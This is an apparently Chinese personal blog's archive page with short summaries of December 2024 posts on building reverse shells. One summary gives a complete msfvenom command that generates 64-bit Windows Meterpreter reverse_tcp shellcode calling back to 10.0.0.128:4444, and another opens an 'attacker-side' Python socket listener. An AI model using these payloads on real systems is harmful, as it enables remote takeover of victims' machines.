12 2024 档案

摘要:python -m http.server 8000 阅读全文
posted @ 2024-12-28 15:29 ljn19961215 阅读(1) 评论(0) 推荐(0) 编辑
摘要:msf生成64位shellcode代码如下 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -f py 32位我忘记了,自己去试 攻击端代码不变,请看上一篇 64位目标机代码如下 #!/usr/b 阅读全文
posted @ 2024-12-26 12:43 ljn19961215 阅读(34) 评论(0) 推荐(0) 编辑
摘要:攻击端代码 import socket# 创建一个TCP socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)# 设置监听的IP和端口host = '0.0.0.0' # 监听所有网络接口port = 444 # 监听端口# 阅读全文
posted @ 2024-12-26 11:34 ljn19961215 阅读(6) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示